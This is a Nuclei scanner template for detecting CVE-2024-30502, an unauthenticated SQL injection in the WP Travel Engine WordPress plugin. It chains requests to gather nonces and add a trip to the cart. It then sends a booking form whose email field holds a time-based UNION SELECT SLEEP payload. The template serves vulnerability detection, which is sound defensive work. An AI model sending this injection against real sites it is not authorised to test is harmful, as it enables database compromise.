id: CVE-2024-30502 info: name: WP Travel Engine <= 5.7.9 - SQL Injection author: Shivam Kamboj severity: critical description: | WP Travel Engine 5.7.9 and earlier contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL queries, exploit requires user interaction. impact: | Attackers can execute arbitrary SQL queries, potentially leading to data theft, modification, or deletion. remediation: | Update to the latest version of WP Travel Engine. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel-engine/wp-travel-engine-579-unauthenticated-sql-injection - https://patchstack.com/database/wordpress/plugin/wp-travel-engine/vulnerability/wordpress-wp-travel-engine-plugin-5-7-9-unauth-blind-sql-injection-vulnerability - https://plugins.trac.wordpress.org/changeset?old_path=/wp-travel-engine/tags/5.7.9&new_path=/wp-travel-engine/tags/5.8.0&sfp_email=&sfph_mail= - https://nvd.nist.gov/vuln/detail/CVE-2024-30502 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2024-30502 epss-score: 0.18426 epss-percentile: 0.95359 cwe-id: CWE-89 metadata: max-request: 4 verified: true tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,wp-travel-engine,unauth flow: http(1) && http(2) && http(3) && http(4) http: - raw: - | GET /trip/ HTTP/1.1 Host: {{Hostname}} redirects: true max-redirects: 3 matchers: - type: word part: body words: - 'addtocart' - 'tripID' condition: and internal: true extractors: - type: regex name: trip_id part: body group: 1 regex: - 'tripID[^\w]*([0-9]+)' internal: true - type: regex name: addtocart_nonce part: body group: 1 regex: - 'addtocart[^\w]*([a-f0-9]{8,12})' internal: true - raw: - | POST /wp-admin/admin-ajax.php?action=wte_add_trip_to_cart&_nonce={{addtocart_nonce}}&cart_version=2 HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"tripID":{{trip_id}},"packageID":{{trip_id}},"tripDate":"2026-04-01","tripTime":"","travelers":1,"cartTotal":100,"pricingOptions":{"adult":{"pax":1,"cost":100,"categoryInfo":{"label":"Adult","pricingType":"per-person"}}}} matchers: - type: word part: body words: - '"success":true' internal: true - raw: - | GET /wp-travel-engine-checkout/ HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body words: - 'booking_process_nonce' internal: true extractors: - type: regex name: booking_nonce part: body group: 1 regex: - 'booking_process_nonce" value="([a-f0-9]+)"' internal: true - raw: - | @timeout: 20s POST /wp-travel-engine-checkout/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=wp_travel_engine_new_booking_process_action&wp_travel_engine_new_booking_process_nonce={{booking_nonce}}&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bfname%5D=T&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Blname%5D=U&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bemail%5D=x%40x.com'+UNION+SELECT+SLEEP(7)%23&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Baddress%5D=x&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bcity%5D=x&wp_travel_engine_booking_setting%5Bplace_order%5D%5Bbooking%5D%5Bcountry%5D=US&wp_travel_engine_nw_bkg_submit=true&wpte_checkout_paymnet_method=booking_only matchers: - type: dsl dsl: - 'duration>=7' - 'status_code == 200' condition: and # digest: 4b0a00483046022100c865e2241153be0033b539535f418d2d5dd0e1b23d517ed966109ee90296bbf0022100b8c08fb7d3012350490bc5ba7b6be46d644e860476468442c6ba59ee1a39c11a:922c64590222798bb761d5b6d8e72950